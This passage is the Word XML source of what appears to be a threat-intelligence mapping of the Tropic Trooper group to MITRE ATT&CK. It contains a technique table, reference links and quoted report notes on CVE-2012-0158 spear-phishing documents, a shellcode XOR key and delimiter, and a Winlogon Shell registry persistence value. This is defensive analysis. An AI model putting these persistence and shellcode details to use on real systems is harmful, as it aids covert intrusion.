          <w:p w14:paraId="58B85CB6" w14:textId="659C02D3" w:rsidR="00F2132E" w:rsidRPr="000132D7" w:rsidRDefault="00593B1C" w:rsidP="00C64366">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="825" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="33C99074" w14:textId="2EC605DC" w:rsidR="00F2132E" w:rsidRPr="000132D7" w:rsidRDefault="009C415E" w:rsidP="00C64366">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3435" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="56B77FEA" w14:textId="046B3C13" w:rsidR="00F2132E" w:rsidRPr="000132D7" w:rsidRDefault="000132D7" w:rsidP="00C64366">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>From ATT&amp;CK group description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000132D7" w:rsidRPr="002D1D50" w14:paraId="5B979063" w14:textId="77777777" w:rsidTr="00486595">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3FC4E687" w14:textId="4FB8112E" w:rsidR="000132D7" w:rsidRDefault="000132D7" w:rsidP="00486595">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>23</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1609" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7FCC9A90" w14:textId="77777777" w:rsidR="000132D7" w:rsidRPr="00442F82" w:rsidRDefault="000132D7" w:rsidP="00486595">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00442F82">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00442F82">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>0011 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00442F82">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Command and Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2291" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="67527820" w14:textId="77777777" w:rsidR="000132D7" w:rsidRPr="0035652A" w:rsidRDefault="000132D7" w:rsidP="00486595">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00665981">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">T1573.001 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00665981">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Encrypted Channel: Symmetric Cryptography</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="649" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="61D76087" w14:textId="092B4523" w:rsidR="000132D7" w:rsidRDefault="00593B1C" w:rsidP="00486595">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>22</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="651" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1E9F1361" w14:textId="77777777" w:rsidR="000132D7" w:rsidRPr="002D1D50" w:rsidRDefault="000132D7" w:rsidP="00486595">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="556" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="57B73F23" w14:textId="5C07FB3F" w:rsidR="000132D7" w:rsidRPr="002D1D50" w:rsidRDefault="00593B1C" w:rsidP="00486595">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="825" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2BFE05D2" w14:textId="2DB54AEE" w:rsidR="000132D7" w:rsidRPr="002D1D50" w:rsidRDefault="009C415E" w:rsidP="00486595">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3435" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4B32168A" w14:textId="4EFB2C6A" w:rsidR="000132D7" w:rsidRDefault="000132D7" w:rsidP="00486595">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[9] Example tool response communication (and next command)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000132D7" w:rsidRPr="0033163A" w14:paraId="74A43A6A" w14:textId="77777777" w:rsidTr="00BF7C25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1C56D022" w14:textId="77777777" w:rsidR="000132D7" w:rsidRDefault="000132D7" w:rsidP="00C64366">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1609" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="497B6AD0" w14:textId="77777777" w:rsidR="000132D7" w:rsidRDefault="000132D7" w:rsidP="00C64366">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2291" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1EBD8BD3" w14:textId="77777777" w:rsidR="000132D7" w:rsidRDefault="000132D7" w:rsidP="00C64366">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="649" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="68A9E475" w14:textId="77777777" w:rsidR="000132D7" w:rsidRPr="0033163A" w:rsidRDefault="000132D7" w:rsidP="00C64366">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="651" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="58AE4F4B" w14:textId="77777777" w:rsidR="000132D7" w:rsidRPr="0033163A" w:rsidRDefault="000132D7" w:rsidP="00C64366">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="556" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3224D494" w14:textId="77777777" w:rsidR="000132D7" w:rsidRPr="0033163A" w:rsidRDefault="000132D7" w:rsidP="00C64366">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="825" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="49FBED8F" w14:textId="77777777" w:rsidR="000132D7" w:rsidRPr="0033163A" w:rsidRDefault="000132D7" w:rsidP="00C64366">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3435" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="60D55ED7" w14:textId="77777777" w:rsidR="000132D7" w:rsidRDefault="000132D7" w:rsidP="00C64366">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="226B5BA1" w14:textId="77777777" w:rsidR="00324B94" w:rsidRPr="0077286F" w:rsidRDefault="00324B94" w:rsidP="00324B94"/>
    <w:p w14:paraId="0BA6EC55" w14:textId="4FE84A55" w:rsidR="00324B94" w:rsidRDefault="00324B94" w:rsidP="00324B94">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[1] </w:t>
      </w:r>
      <w:hyperlink r:id="rId182" w:history="1">
        <w:r w:rsidR="001A6323">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Tropic Trooper Targets Taiwanese Government and Fossil Fuel Provider With Poison Ivy (paloaltonetworks.com)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00227A6C">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>[201</w:t>
      </w:r>
      <w:r w:rsidR="001A6323">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="00227A6C">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D787679" w14:textId="08A5E801" w:rsidR="001A6323" w:rsidRDefault="001A6323" w:rsidP="00324B94">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">[2] </w:t>
      </w:r>
      <w:hyperlink r:id="rId183" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">How Operation Tropic Trooper Infiltrates Secret Keepers - </w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Wiadomości</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>bezpieczeństwa</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve"> (trendmicro.com)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> [2015] (not from ATT&amp;CK)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59D5CD94" w14:textId="4218DD02" w:rsidR="001A6323" w:rsidRDefault="001A6323" w:rsidP="00324B94">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>[3]</w:t>
      </w:r>
      <w:r w:rsidR="002F72D5">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId184" w:history="1">
        <w:r w:rsidR="002F72D5">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Operation Tropic Trooper: Relying on Tried-and-Tested Flaws to Infiltrate Secret Keepers (trendmicro.com)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="002F72D5">
        <w:t xml:space="preserve"> [2015] (from ATT&amp;CK</w:t>
      </w:r>
      <w:r w:rsidR="004400FE">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="002F72D5">
        <w:t xml:space="preserve"> but link from ATT&amp;CK broken so re fou</w:t>
      </w:r>
      <w:r w:rsidR="004400FE">
        <w:t>nd and listed here</w:t>
      </w:r>
      <w:r w:rsidR="002F72D5">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="778DE751" w14:textId="3D863691" w:rsidR="001A6323" w:rsidRDefault="001A6323" w:rsidP="00324B94">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>[4]</w:t>
      </w:r>
      <w:r w:rsidR="00ED2594">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId185" w:history="1">
        <w:r w:rsidR="00ED2594">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Familiar Feeling: A Malware Campaign Targeting the Tibetan Diaspora Resurfaces - The Citizen Lab</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00ED2594">
        <w:t xml:space="preserve"> [2018]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34810E22" w14:textId="2EF51F23" w:rsidR="001A6323" w:rsidRDefault="001A6323" w:rsidP="00324B94">
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>[5]</w:t>
      </w:r>
      <w:r w:rsidR="00ED2594">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId186" w:anchor="When:15:00:00Z" w:history="1">
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidR="00ED2594">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Anomali</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r w:rsidR="00ED2594">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve"> Suspects that China-Backed APT Pirate Panda May Be Seeking Access to Vietnam Government Data </w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidR="00ED2594">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Center</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r w:rsidR="00ED2594">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve"> | </w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidR="00ED2594">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Anomali</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
      </w:hyperlink>
      <w:r w:rsidR="00ED2594">
        <w:t xml:space="preserve"> [2020]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CB85962" w14:textId="12B55278" w:rsidR="00ED2594" w:rsidRDefault="00ED2594" w:rsidP="00324B94">
      <w:r>
        <w:t xml:space="preserve">[6] </w:t>
      </w:r>
      <w:hyperlink r:id="rId187" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">Tropic Trooper’s Back: </w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>USBferry</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve"> Attack Targets Air-gapped Environments (trendmicro.com)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> [2020]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51298BE0" w14:textId="41D4C085" w:rsidR="009C4BF7" w:rsidRDefault="009C4BF7" w:rsidP="00324B94">
      <w:r>
        <w:t xml:space="preserve">[7] </w:t>
      </w:r>
      <w:hyperlink r:id="rId188" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Deep Analysis of New Poison Ivy Variant (fortinet.com)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> [2017] (not from ATT&amp;CK)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19EA7966" w14:textId="053D5180" w:rsidR="00761B25" w:rsidRDefault="00761B25" w:rsidP="00324B94">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[8] </w:t>
      </w:r>
      <w:hyperlink r:id="rId189" w:history="1">
        <w:r w:rsidR="00595849">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>CVE - CVE-2012-0158 (mitre.org)</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1C6C557F" w14:textId="7CD3842B" w:rsidR="00DE0672" w:rsidRPr="00DE0672" w:rsidRDefault="00DE0672" w:rsidP="00324B94">
      <w:r w:rsidRPr="00DE0672">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">[9] </w:t>
      </w:r>
      <w:hyperlink r:id="rId190" w:history="1">
        <w:proofErr w:type="spellStart"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>PoisonIvy</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>, Software S0012 | MITRE ATT&amp;CK®</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1F19F372" w14:textId="419D0ECD" w:rsidR="00E9236C" w:rsidRDefault="00E9236C" w:rsidP="00324B94"/>
    <w:p w14:paraId="414DAA5F" w14:textId="77777777" w:rsidR="00E9236C" w:rsidRDefault="00E9236C" w:rsidP="00324B94"/>
    <w:p w14:paraId="1291CBD3" w14:textId="467B3832" w:rsidR="00E9236C" w:rsidRDefault="00E9236C" w:rsidP="00324B94">
      <w:r>
        <w:t xml:space="preserve">[1] </w:t>
      </w:r>
      <w:r w:rsidRPr="00E9236C">
        <w:t>The documents attached to spear-phishing e-mails used in both attacks contain code that exploits CVE-2012-0158, which despite its age remains one of the most common Microsoft Word vulnerabilities being exploited by multiple threat actors. This matches with known Tactics, Techniques, and Procedures (TTPs) for Tropic Trooper, targeting both government institutions and also the energy industry in Taiwan.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00279FD3" w14:textId="3FB15BAC" w:rsidR="00EC6D70" w:rsidRDefault="00EC6D70" w:rsidP="00324B94">
      <w:r>
        <w:t xml:space="preserve">[1] </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC6D70">
        <w:t xml:space="preserve">The delivery document uses the XLSX extension typically used by </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EC6D70">
        <w:t>OpenXML</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EC6D70">
        <w:t xml:space="preserve"> documents, but the file itself is actually an OLE (XLS) document. The file extension to file type discrepancy was caused by the actor using Excel's built-in encryption capability, which stores XLSX ciphertext and the information needed for decryption in an OLE document.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="251AF1D9" w14:textId="5643460D" w:rsidR="00761B25" w:rsidRDefault="00761B25" w:rsidP="00324B94">
      <w:r>
        <w:t xml:space="preserve">[1] </w:t>
      </w:r>
      <w:r w:rsidRPr="00761B25">
        <w:t>The file extension to file type discrepancy was caused by the actor using Excel's built-in encryption capability, which stores XLSX ciphertext and the information needed for decryption in an OLE document.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB07650" w14:textId="29A9DA55" w:rsidR="000D6538" w:rsidRDefault="000D6538" w:rsidP="000D6538">
      <w:r>
        <w:t>[1] The embedded shellcode enumerates open handles for a file with a size greater than 0xa6f0 (Decimal - 42736) bytes. It will then set the file pointer to 0xa6e8 (Decimal - 42728) and starts looking for the following delimiter:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B24544C" w14:textId="45521F35" w:rsidR="000D6538" w:rsidRDefault="000D6538" w:rsidP="000D6538">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GfCv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xef</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xfe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xce</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6DE3578E" w14:textId="5C18AE5F" w:rsidR="000D6538" w:rsidRDefault="000D6538" w:rsidP="000D6538">
      <w:r>
        <w:t>If it finds this delimiter, the shellcode knows it is working with the correct file and continues by reading 0x600 (decimal 1536) bytes following this delimiter. The shellcode then decrypts the first 0xc0 (decimal 192) DWORDs of the data read from the file using an XOR algorithm that decrypts one DWORD of ciphertext at a time with 0x29f7c592. The resulting cleartext is a second piece of shellcode that continues carrying out further functionality.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E65C03" w14:textId="7EFA9ED7" w:rsidR="004F01AF" w:rsidRDefault="004F01AF" w:rsidP="000D6538">
      <w:r>
        <w:t xml:space="preserve">[1] </w:t>
      </w:r>
      <w:r w:rsidRPr="004F01AF">
        <w:t>The secondary shellcode starts by resolving the following API functions using a ROT13 hashing algorithm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="195D974F" w14:textId="5462D88E" w:rsidR="00551610" w:rsidRDefault="00551610" w:rsidP="00551610">
      <w:r>
        <w:t>[1]</w:t>
      </w:r>
      <w:r w:rsidR="0093121F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>The shellcode then creates a string that it uses to create a registry key to automatically run the final payload each time the system starts. It then opens the registry key 'Software\Microsoft\Windows NT\CurrentVersion\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Winlogon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>' and sets the value to the "Shell" subkey to the previously created string. Ultimately, the following registry key is created for persistence:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36828326" w14:textId="77777777" w:rsidR="00551610" w:rsidRDefault="00551610" w:rsidP="00551610">
      <w:r>
        <w:t>HKCU\Software\Microsoft\Windows NT\CurrentVersion\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Winlogon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\Shell:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47EE0D4A" w14:textId="77777777" w:rsidR="00551610" w:rsidRDefault="00551610" w:rsidP="00551610">
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>explorer.exe,rundll32.exe</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> "C:\Documents and Settings\Administrator\Application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E3AB82" w14:textId="004BEEBB" w:rsidR="00551610" w:rsidRDefault="00551610" w:rsidP="00551610">
      <w:r>
        <w:t>Data\Identities\Identities.ocx" SSSS"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C123301" w14:textId="0832A008" w:rsidR="00B65FA1" w:rsidRDefault="00B65FA1" w:rsidP="00551610">
      <w:r>
        <w:t xml:space="preserve">[1] </w:t>
      </w:r>
      <w:r w:rsidRPr="00B65FA1">
        <w:t>The shellcode then enters a decryption loop to convert the embedded payload from ciphertext to cleartext.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19320243" w14:textId="05A47A71" w:rsidR="004F01AF" w:rsidRDefault="004F01AF" w:rsidP="00551610">
      <w:r>
        <w:t xml:space="preserve">[1] </w:t>
      </w:r>
      <w:r w:rsidRPr="004F01AF">
